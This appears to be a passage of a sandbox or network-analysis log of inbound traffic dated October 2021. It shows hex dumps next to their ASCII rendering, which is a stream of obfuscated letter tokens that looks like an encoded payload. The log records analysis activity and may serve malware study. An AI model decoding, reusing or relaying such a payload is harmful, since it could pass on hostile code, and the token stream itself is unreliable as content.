2021-10-29 18:50:03 UTC	1366	IN	Data Raw: 72 20 4e 56 43 20 56 63 20 4e 49 49 20 4e 4e 56 20 59 43 20 59 49 20 59 56 20 72 4e 20 57 43 20 56 59 59 20 72 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 56 4e 20 56 56 63 20 56 72 59 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 63 57 20 4d 4e 20 59 43 20 72 49 20 59 63 20 63 57 20 4e 43 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4c 4e 20 56 56 4d 20 72 49 20 59 43 20 63 43 20 4c 57 20 56 4e 4c 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 59 4d 20 59 4c 20 4c 43 20 63 56 20 49 4e 20 56 59 56 20 49 57 20 4e 43 59 20 4e 4e 63 20 72 57 20 4e 20 72 49 20 72 57 20 4e 56 63 20 4e 4e 72 20 4e 4e 57 20 63 57 20 4e 63 56 20 59 43 20 72 49 20 59 63 20 59 49 20 63 63 20 4e 56 4d 20 4d 4d 20 4e 56 72 20 4e 4e 4c 20 59 43 20 72 49 20 59 49 20 63 4c 20 56 43 63 20 57 4d 20 4e 4e 4c 20 4e Data Ascii: r NVC Vc NII NNV YC YI YV rN WC VYY rM NCW NNV YN VN VVc VrY Ir NNr NNL cW MN YC rI Yc cW NCI NNr NNM NCL LN VVM rI YC cC LW VNL NNM NCW NVV YM YL LC cV IN VYV IW NCY NNc rW N rI rW NVc NNr NNW cW NcV YC rI Yc YI cc NVM MM NVr NNL YC rI YI cL VCc WM NNL N
2021-10-29 18:50:03 UTC	1370	IN	Data Raw: 43 20 49 63 20 4e 4e 4c 20 49 20 57 72 20 4e 4e 56 20 59 43 20 59 56 20 56 72 20 72 43 20 49 63 20 57 20 63 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 4e 63 20 59 56 20 49 4d 20 4e 59 20 63 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 72 72 20 59 56 20 72 4d 20 4d 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 4e 49 20 72 49 20 59 4c 20 72 4e 20 4d 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 72 63 20 72 49 20 4d 4d 20 57 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 4e 63 20 59 43 20 72 57 20 4d 59 20 57 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 72 72 20 59 43 20 4d 4c 20 4e 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4d 4e 20 49 56 20 72 49 20 59 4e 20 4d 57 20 4e 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4d 4e 20 4e 4e 43 20 72 49 20 Data Ascii: C Ic NNL I Wr NNV YC YV Vr rC Ic W cY NCW NNV Yr Vc Nc YV IM NY cY NCW NNV Yr Vc rr YV rM MN NNM NCW NNc Vr NI rI YL rN MN NNM NCW NNc Vr rc rI MM WI NNr NNM NCY WC Nc YC rW MY WI NNr NNM NCY WC rr YC ML N Ir NNr NNL MN IV rI YN MW N Ir NNr NNL MN NNC rI
2021-10-29 18:50:03 UTC	1374	IN	Data Raw: 59 20 4e 4e 56 20 59 43 20 59 49 20 56 72 20 72 43 20 49 63 20 57 20 57 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 4e 63 20 59 56 20 49 4d 20 4e 59 20 57 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 63 20 72 72 20 59 56 20 72 4d 20 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 4e 49 20 72 49 20 59 4c 20 72 4e 20 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 56 72 20 72 63 20 72 49 20 4d 4d 20 72 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 4e 63 20 59 43 20 72 57 20 4d 59 20 72 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 59 20 57 43 20 72 72 20 59 43 20 56 63 20 49 72 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4d 4e 20 4e 4e 43 20 72 49 20 4d 59 20 4d 4d 20 59 72 20 49 72 20 4e 4e 49 20 57 59 20 4d 57 20 4e 4e 72 20 72 57 20 4d 4d 20 4d 4d 20 59 72 20 49 72 20 Data Ascii: Y NNV YC YI Vr rC Ic W W NCW NNV Yr Vc Nc YV IM NY W NCW NNV Yr Vc rr YV rM NY NNM NCW NNc Vr NI rI YL rN NY NNM NCW NNc Vr rc rI MM rV NNr NNM NCY WC Nc YC rW MY rV NNr NNM NCY WC rr YC Vc Ir Ir NNr NVM MN NNC rI MY MM Yr Ir NNI WY MW NNr rW MM MM Yr Ir
2021-10-29 18:50:03 UTC	1378	IN	Data Raw: 49 72 20 4e 56 43 20 4e 63 57 20 4e 4d 57 20 4e 4e 59 20 56 43 20 56 4c 49 20 59 43 20 4c 63 20 49 63 20 57 43 20 56 4e 59 20 4e 43 49 20 4e 4e 56 20 59 63 20 4e 43 20 4e 56 43 20 56 43 4e 20 4e 4d 4e 20 4e 72 4e 20 4e 4d 4e 20 57 57 20 57 49 20 72 49 20 56 43 63 20 4c 63 20 4e 4e 72 20 49 72 20 4e 4e 72 20 4e 4e 43 20 56 20 4e 56 4c 20 59 43 20 72 49 20 59 63 20 56 4c 72 20 49 63 20 4e 20 56 4c 49 20 4e 43 49 20 4e 4e 56 20 59 56 20 4c 59 20 59 49 20 4c 57 20 57 56 20 57 43 20 57 20 4e 43 57 20 4e 4e 56 20 59 63 20 59 59 20 57 4c 20 4e 4d 4d 20 49 72 20 4e 4e 72 20 4e 56 4d 20 56 20 43 20 59 43 20 72 49 20 59 63 20 49 57 20 56 72 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 4d 20 59 49 20 72 4d 20 56 43 20 4e 49 4d 20 4e 72 20 4e 4e 72 20 4e 4e 4d 20 4e Data Ascii: Ir NVC NcW NMW NNY VC VLI YC Lc Ic WC VNY NCI NNV Yc NC NVC VCN NMN NrN NMN WW WI rI VCc Lc NNr Ir NNr NNC V NVL YC rI Yc VLr Ic N VLI NCI NNV YV LY YI LW WV WC W NCW NNV Yc YY WL NMM Ir NNr NVM V C YC rI Yc IW Vrc NNY NNM NCM WM YI rM VC NIM Nr NNr NNM N
2021-10-29 18:50:03 UTC	1381	IN	Data Raw: 43 20 4c 43 20 59 72 20 4e 4c 43 20 4d 49 20 4e 4e 63 20 4e 4e 4d 20 4d 4d 20 4e 4e 63 20 4e 4c 72 20 72 56 20 56 57 20 59 72 20 72 4c 20 4d 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 59 43 20 56 72 4d 20 56 57 20 63 49 20 4e 56 43 20 4e 4e 63 20 4e 4e 4d 20 4d 43 20 49 56 20 63 72 20 56 49 20 59 56 20 59 72 20 4e 4c 72 20 4e 4e 4c 20 4d 20 63 59 20 4e 4e 49 20 59 43 20 4e 72 43 20 59 56 20 63 49 20 4e 56 43 20 4e 4e 63 20 4e 4e 4d 20 56 4c 4c 20 49 59 20 4e 72 59 20 59 20 63 43 20 59 72 20 56 56 49 20 63 4d 20 4e 72 4d 20 4d 43 20 4e 4e 49 20 59 43 20 56 43 43 20 4e 20 4d 63 20 4e 4e 43 20 4e 4e 63 20 4e 4e 4d 20 56 72 4d 20 49 43 20 63 72 20 56 49 20 63 43 20 59 72 20 4e 49 63 20 4e 43 57 20 4e 72 4d 20 4d 43 20 4e 4e 49 20 59 43 20 4e 59 59 20 56 20 4e Data Ascii: C LC Yr NLC MI NNc NNM MM NNc NLr rV VW Yr rL MC NNM NCW NNI YC VrM VW cI NVC NNc NNM MC IV cr VI YV Yr NLr NNL M cY NNI YC NrC YV cI NVC NNc NNM VLL IY NrY Y cC Yr VVI cM NrM MC NNI YC VCC N Mc NNC NNc NNM VrM IC cr VI cC Yr NIc NCW NrM MC NNI YC NYY V N
2021-10-29 18:50:03 UTC	1386	IN	Data Raw: 56 72 20 4e 43 57 20 56 4c 20 59 43 20 72 57 20 59 4e 20 59 72 20 49 72 20 4e 57 4e 20 4d 4c 20 4e 43 57 20 4e 4e 56 20 57 59 20 72 49 20 59 57 20 59 72 20 56 4e 4c 20 4e 4e 72 20 56 72 72 20 4e 43 57 20 57 63 20 59 43 20 4e 49 59 20 4e 4d 20 59 72 20 49 72 20 57 4e 20 4e 4e 4d 20 4e 43 43 20 4e 4e 56 20 4e 49 4c 20 72 49 20 4e 4d 57 20 59 59 20 63 49 20 4e 4e 72 20 63 63 20 72 63 20 4e 4e 56 20 59 43 20 56 59 20 59 43 20 63 4e 20 49 72 20 56 72 57 20 4e 4e 4d 20 56 4c 63 20 4e 4e 4c 20 4c 72 20 72 49 20 4e 57 43 20 4d 20 49 72 20 4e 4e 72 20 57 56 20 4e 43 57 20 4e 56 4c 20 59 43 20 4e 49 49 20 59 43 20 4e 49 4c 20 49 59 20 57 49 20 4e 4e 4d 20 4e 49 59 20 49 49 20 59 43 20 72 49 20 56 4d 20 59 72 20 57 59 20 4e 4e 72 20 56 72 49 20 4e 43 57 20 56 72 4e Data Ascii: Vr NCW VL YC rW YN Yr Ir NWN ML NCW NNV WY rI YW Yr VNL NNr Vrr NCW Wc YC NIY NM Yr Ir WN NNM NCC NNV NIL rI NMW YY cI NNr cc rc NNV YC VY YC cN Ir VrW NNM VLc NNL Lr rI NWC M Ir NNr WV NCW NVL YC NII YC NIL IY WI NNM NIY II YC rI VM Yr WY NNr VrI NCW VrN
2021-10-29 18:50:03 UTC	1390	IN	Data Raw: 4c 4c 20 72 57 20 59 43 20 59 72 20 4e 43 20 4e 56 4c 20 4e 4e 4d 20 4e 43 57 20 72 4e 20 59 4e 20 56 43 20 59 4e 20 4e 57 20 49 63 20 57 4d 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 4d 4e 20 63 4c 20 59 43 20 59 72 20 4e 4c 20 4e 4e 59 20 49 4e 20 4e 43 49 20 49 59 20 72 49 20 4c 59 20 59 4e 20 59 72 20 49 72 20 56 72 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 43 4d 20 72 57 20 56 56 20 59 59 20 4e 4e 4c 20 4e 4e 56 20 4e 43 56 20 4e 43 49 20 4e 4e 56 20 59 43 20 59 4c 20 59 59 20 59 72 20 49 72 20 72 4c 20 4e 4e 63 20 4d 4c 20 4e 4e 4c 20 56 4c 20 59 43 20 4c 4c 20 59 59 20 49 72 20 4e 4e 72 20 56 4c 4e 20 57 49 20 4e 4e 56 20 59 43 20 4e 43 59 20 59 4e 20 4e 49 20 49 59 20 49 4d 20 4e 4e 57 20 4e 56 63 20 4e 4e 4c 20 59 43 20 72 49 20 56 72 56 20 59 72 Data Ascii: LL rW YC Yr NC NVL NNM NCW rN YN VC YN NW Ic WM NNc NCW NNV MN cL YC Yr NL NNY IN NCI IY rI LY YN Yr Ir Vrc NNM NCW NNV NCM rW VV YY NNL NNV NCV NCI NNV YC YL YY Yr Ir rL NNc ML NNL VL YC LL YY Ir NNr VLN WI NNV YC NCY YN NI IY IM NNW NVc NNL YC rI VrV Yr
2021-10-29 18:50:03 UTC	1394	IN	Data Raw: 57 20 4e 4e 4c 20 59 43 20 72 72 20 72 63 20 4e 72 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 72 56 20 4e 43 49 20 59 56 20 4c 4c 20 59 4e 20 59 72 20 72 59 20 4e 4e 4e 20 4e 43 20 4e 56 72 20 4e 4e 4c 20 59 43 20 4e 63 4c 20 72 4d 20 4e 72 72 20 49 72 20 63 59 20 4e 4e 63 20 56 56 56 20 4e 56 63 20 4e 49 56 20 4c 4c 20 4e 20 59 59 20 4e 56 20 57 49 20 56 59 56 20 4e 56 72 20 63 4d 20 59 4e 20 63 72 20 4c 49 20 4e 4d 49 20 63 57 20 63 59 20 4e 4e 63 20 4e 4e 43 20 4e 4e 57 20 4e 49 49 20 4c 4c 20 4e 20 59 59 20 4e 4d 72 20 4e 56 4d 20 56 4c 43 20 4e 56 72 20 63 4d 20 59 4e 20 4e 57 63 20 59 63 20 4e 4d 72 20 63 57 20 63 59 20 4e 4e 63 20 56 4c 4e 20 4e 56 63 20 4e 4d 59 20 4c 4c 20 4e 20 59 59 20 56 4e 4c 20 57 49 20 56 4e 59 20 4e 56 72 20 63 4d 20 59 4e 20 Data Ascii: W NNL YC rr rc Nrr Ir NNY NNM rV NCI YV LL YN Yr rY NNN NC NVr NNL YC NcL rM Nrr Ir cY NNc VVV NVc NIV LL N YY NV WI VYV NVr cM YN cr LI NMI cW cY NNc NNC NNW NII LL N YY NMr NVM VLC NVr cM YN NWc Yc NMr cW cY NNc VLN NVc NMY LL N YY VNL WI VNY NVr cM YN
2021-10-29 18:50:03 UTC	1398	IN	Data Raw: 4e 4d 49 20 4e 4e 59 20 4e 49 72 20 4d 49 20 4e 4e 4c 20 59 43 20 63 20 59 43 20 49 56 20 4e 43 57 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 63 72 20 72 49 20 4e 57 4c 20 57 20 4e 49 43 20 57 4d 20 63 4d 20 4e 43 57 20 4e 57 56 20 4e 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 56 56 4d 20 4e 4e 4d 20 4e 59 49 20 4d 57 20 56 4e 4c 20 4c 59 20 4e 43 20 59 72 20 4e 56 20 4d 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 4d 4d 20 59 43 20 4e 43 4d 20 4e 43 59 20 4e 4c 43 20 4e 43 56 20 49 4d 20 4e 4e 56 20 4e 72 20 4e 4e 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 72 20 4e 43 57 20 4e 57 4d 20 56 4e 20 56 43 4d 20 4c 4c 20 57 20 49 72 20 4e 72 20 4d 49 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 4d 57 20 59 72 20 4e 4d 72 20 63 4d 20 Data Ascii: NMI NNY NIr MI NNL YC c YC IV NCW NNr NNM NCW NNV Ncr rI NWL W NIC WM cM NCW NWV NN rI YC Yr Ir VVM NNM NYI MW VNL LY NC Yr NV MV NNM NCW NNV YC NMM YC NCM NCY NLC NCV IM NNV Nr NN YC Yr Ir NNr Vrr NCW NWM VN VCM LL W Ir Nr MI NCW NNV YC rI NMW Yr NMr cM
2021-10-29 18:50:03 UTC	1402	IN	Data Raw: 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 59 4e 20 4e 4e 56 20 4e 43 49 20 72 63 20 56 56 4c 20 4c 72 20 4e 72 4c 20 4e 4e 72 20 4e 43 59 20 59 4c 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 63 43 20 49 72 20 4e 56 57 20 4e 4e 59 20 4e 56 49 20 4e 43 43 20 56 4c 63 20 72 49 20 49 20 4e 4e 43 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 56 4c 43 20 59 43 20 72 4d 20 4c 20 56 4e 57 20 63 72 20 4e 72 4d 20 4e 4e 4d 20 4c 4c 20 72 43 20 59 43 20 72 49 20 59 43 20 59 72 20 4e 57 72 20 4e 4e 72 20 57 20 72 72 20 4e 59 4d 20 4c 49 20 56 4e 56 20 59 43 20 4e 43 72 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 63 72 20 72 49 20 4e 4e 43 20 72 57 20 4e 49 59 20 4e 43 56 20 4e 72 63 20 4e 43 57 20 72 20 4e 43 63 20 72 49 20 59 43 20 59 Data Ascii: c Yr Ir NNr NNM VYN NNV NCI rc VVL Lr NrL NNr NCY YL NNV YC rI YC NcC Ir NVW NNY NVI NCC VLc rI I NNC Ir NNr NNM NCW VLC YC rM L VNW cr NrM NNM LL rC YC rI YC Yr NWr NNr W rr NYM LI VNV YC NCr NV NNr NNM NCW NNV Ncr rI NNC rW NIY NCV Nrc NCW r NCc rI YC Y
2021-10-29 18:50:03 UTC	1406	IN	Data Raw: 20 59 43 20 4e 72 57 20 4e 43 72 20 4e 56 72 20 57 57 20 4c 4c 20 4e 4e 4c 20 59 43 20 4e 49 4c 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 56 4d 20 4e 43 57 20 4e 72 57 20 56 72 20 4c 49 20 4c 63 20 4e 56 43 20 49 59 20 56 72 4e 20 56 72 56 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 63 72 20 63 56 20 56 57 20 4e 43 4d 20 4e 43 72 20 4e 56 4c 20 63 4c 20 59 4e 20 4e 56 49 20 4e 49 4e 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 59 4e 20 4e 4e 56 20 57 63 20 72 4e 20 4e 4d 20 4c 56 20 56 4d 20 4e 4e 59 20 4e 4c 4c 20 56 4c 72 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 63 43 20 49 72 20 72 4e 20 4e 43 49 20 4e 49 43 20 4e 56 59 20 57 49 20 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 59 20 4e 43 57 20 56 56 59 20 4e 49 20 56 56 56 20 49 Data Ascii: YC NrW NCr NVr WW LL NNL YC NIL YC Yr Ir NNr VVM NCW NrW Vr LI Lc NVC IY VrN VrV NCW NNV YC rI Ncr cV VW NCM NCr NVL cL YN NVI NIN Yr Ir NNr NNM VYN NNV Wc rN NM LV VM NNY NLL VLr NNV YC rI YC NcC Ir rN NCI NIC NVY WI rW YC Yr Ir NNr VrY NCW VVY NI VVV I
2021-10-29 18:50:03 UTC	1410	IN	Data Raw: 20 4e 4d 72 20 56 43 57 20 59 43 20 72 49 20 59 43 20 59 72 20 56 4e 43 20 4e 56 56 20 4e 4d 59 20 4e 43 4d 20 57 63 20 59 43 20 4e 49 4d 20 59 4e 20 56 59 43 20 56 72 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 49 43 20 59 63 20 4e 4c 59 20 63 56 20 56 56 57 20 4e 43 43 20 56 72 57 20 4e 43 49 20 4e 63 72 20 4e 72 4d 20 72 49 20 59 43 20 59 72 20 49 72 20 56 72 72 20 4e 56 59 20 56 43 49 20 4e 56 43 20 4e 4c 4d 20 4c 49 20 4e 57 43 20 59 59 20 4e 4c 4d 20 56 4e 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 56 20 59 49 20 4e 43 20 57 59 20 4e 49 43 20 57 57 20 56 56 72 20 4e 4e 4c 20 56 4e 59 20 4e 72 59 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 4c 20 4e 43 4e 20 59 56 20 59 4d 20 56 56 72 20 4c 63 20 4e 49 4d 20 49 59 20 4e Data Ascii: NMr VCW YC rI YC Yr VNC NVV NMY NCM Wc YC NIM YN VYC VrY NNr NNM NCW NNV NIC Yc NLY cV VVW NCC VrW NCI Ncr NrM rI YC Yr Ir Vrr NVY VCI NVC NLM LI NWC YY NLM VNN NNM NCW NNV YC NIV YI NC WY NIC WW VVr NNL VNY NrY YC Yr Ir NNr VrL NCN YV YM VVr Lc NIM IY N
2021-10-29 18:50:03 UTC	1413	IN	Data Raw: 63 20 56 56 4e 20 56 4e 4c 20 59 43 20 72 49 20 59 43 20 59 72 20 56 4e 43 20 4e 56 56 20 4e 49 49 20 4e 56 72 20 4e 43 4d 20 59 43 20 4e 59 63 20 59 4e 20 4e 72 56 20 56 72 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 49 43 20 59 63 20 56 56 4d 20 4c 57 20 56 57 20 4e 4e 57 20 56 4e 4d 20 4e 43 49 20 4e 4d 4d 20 4e 59 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 56 72 72 20 4e 56 59 20 4e 4e 59 20 4e 4e 56 20 4e 4d 4c 20 4c 4d 20 4e 59 57 20 59 59 20 4e 59 4d 20 56 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 56 20 59 49 20 4e 4d 20 49 72 20 56 4e 4c 20 57 63 20 4e 57 56 20 4e 4e 4c 20 56 56 72 20 4e 72 57 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 4c 20 4e 43 4e 20 4e 43 63 20 72 57 20 4e 4d 59 20 4c 57 20 4e 59 56 20 49 59 Data Ascii: c VVN VNL YC rI YC Yr VNC NVV NII NVr NCM YC NYc YN NrV VrN NNr NNM NCW NNV NIC Yc VVM LW VW NNW VNM NCI NMM NYN rI YC Yr Ir Vrr NVY NNY NNV NML LM NYW YY NYM VNY NNM NCW NNV YC NIV YI NM Ir VNL Wc NWV NNL VVr NrW YC Yr Ir NNr VrL NCN NCc rW NMY LW NYV IY
2021-10-29 18:50:03 UTC	1418	IN	Data Raw: 20 59 59 20 4d 49 20 56 4e 57 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 49 56 20 59 49 20 4e 4c 57 20 57 56 20 57 49 20 4e 4e 4d 20 4e 57 43 20 4e 4e 4c 20 4e 4d 20 4e 59 4c 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 56 72 4c 20 4e 43 4e 20 4d 63 20 59 4d 20 56 72 57 20 59 43 20 56 56 63 20 49 59 20 49 57 20 56 56 43 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 4e 49 43 20 63 56 20 4e 63 20 4e 56 4e 20 4e 43 4e 20 4e 43 57 20 4e 63 72 20 59 4e 20 72 20 4e 59 59 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 56 4c 59 20 4e 56 43 20 56 4c 59 20 63 43 20 56 59 4e 20 59 72 20 4e 56 57 20 4e 4e 59 20 4d 4c 20 4e 57 63 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 4d 63 20 57 56 20 4e 72 4d 20 4e 56 4e 20 4e 56 59 20 4e 4e 56 20 56 4c 4e 20 72 57 20 4e 4e Data Ascii: YY MI VNW NNM NCW NNV YC NIV YI NLW WV WI NNM NWC NNL NM NYL YC Yr Ir NNr VrL NCN Mc YM VrW YC VVc IY IW VVC NCW NNV YC rI NIC cV Nc NVN NCN NCW Ncr YN r NYY Yr Ir NNr NNM VLY NVC VLY cC VYN Yr NVW NNY ML NWc NNV YC rI YC NMc WV NrM NVN NVY NNV VLN rW NN
2021-10-29 18:50:03 UTC	1422	IN	Data Raw: 43 49 20 59 43 20 4d 59 20 4e 59 4d 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 56 72 4c 20 59 43 20 57 49 20 72 49 20 56 56 4e 20 63 4d 20 72 59 20 4e 4e 57 20 56 4c 63 20 56 4e 57 20 59 43 20 72 49 20 59 43 20 59 72 20 56 4e 43 20 4e 43 63 20 56 59 59 20 49 57 20 4e 4e 4d 20 59 43 20 49 43 20 72 49 20 4e 59 43 20 56 59 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 56 4e 4e 20 72 57 20 4e 4c 63 20 56 4e 20 49 59 20 4e 4e 72 20 56 43 20 4e 4e 4e 20 56 4e 56 20 4e 59 4c 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 72 4d 20 4e 4e 63 20 4e 63 59 20 72 49 20 72 4e 20 72 49 20 49 4c 20 59 56 20 72 20 56 56 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 56 43 57 20 59 57 20 4c 4c 20 4e 43 4d 20 56 43 4c 20 4e 43 57 20 4e 56 20 4e 4e 72 20 4e 43 63 Data Ascii: CI YC MY NYM Ir NNr NNM NCW VrL YC WI rI VVN cM rY NNW VLc VNW YC rI YC Yr VNC NCc VYY IW NNM YC IC rI NYC VYY NNr NNM NCW NNV VNN rW NLc VN IY NNr VC NNN VNV NYL rI YC Yr Ir NrM NNc NcY rI rN rI IL YV r VVL NNM NCW NNV YC VCW YW LL NCM VCL NCW NV NNr NCc
2021-10-29 18:50:03 UTC	1426	IN	Data Raw: 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 20 4d 49 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 57 20 57 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 59 43 20 4e 59 59 20 4e 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4d 63 Data Ascii: r Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc MI YC rI YN Yr rW WL NNM NCW NNr YC NYY NC Yr Ir NNL NNM Mc
2021-10-29 18:50:03 UTC	1430	IN	Data Raw: 20 56 59 4e 20 57 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4e 59 57 20 56 4d 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 4e 57 72 20 49 57 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 57 63 20 56 4e 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 63 4e 20 49 4d 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 57 63 20 56 4e 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 59 4c 20 49 57 20 59 43 20 72 49 20 72 49 20 59 72 20 56 4e 57 20 57 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 57 63 20 56 4e 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 63 4e 20 49 4d 20 59 43 20 72 49 20 59 4e 20 59 72 20 72 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c Data Ascii: VYN WN NNM NCW NNL YC NYW VM Yr Ir NNY NNM NWr IW YC rI YN Yr r IY NNM NCW NNL YC Wc VN Yr Ir NNY NNM cN IM YC rI YN Yr r IY NNM NCW NNL YC Wc VN Yr Ir NNY NNM YL IW YC rI rI Yr VNW WN NNM NCW NNL YC Wc VN Yr Ir NNY NNM cN IM YC rI YN Yr r IY NNM NCW NNL
2021-10-29 18:50:03 UTC	1434	IN	Data Raw: 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 56 56 20 4e 4e 43 20 59 43 20 72 49 20 59 4e 20 59 72 20 4e 43 4c 20 72 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4c 20 4e 4e 56 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 49 49 20 57 43 20 59 43 20 72 49 20 72 57 20 59 72 20 4e 4d 20 4d 57 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4e 4d 20 4e 56 20 59 72 20 49 72 20 4e 4e 59 20 4e 4e 4d 20 72 43 20 4d 4d 20 59 43 20 72 49 20 72 49 20 59 72 20 63 4d 20 4e 43 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 59 43 20 4c 20 4e 4e 56 20 59 72 20 49 72 20 4e 4e 56 20 4e 4e 4d 20 4e 57 4d 20 72 49 20 59 43 20 72 49 20 72 57 20 59 72 20 56 72 72 20 59 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 59 43 20 4e 56 72 20 56 20 59 72 20 49 72 20 4e 4e 57 20 4e 4e 4d 20 Data Ascii: Ir NNV NNM NVV NNC YC rI YN Yr NCL rI NNM NCW NNL YC L NNV Yr Ir NNV NNM NII WC YC rI rW Yr NM MW NNM NCW NNL YC NM NV Yr Ir NNY NNM rC MM YC rI rI Yr cM NCI NNM NCW NNL YC L NNV Yr Ir NNV NNM NWM rI YC rI rW Yr Vrr YC NNM NCW NNc YC NVr V Yr Ir NNW NNM
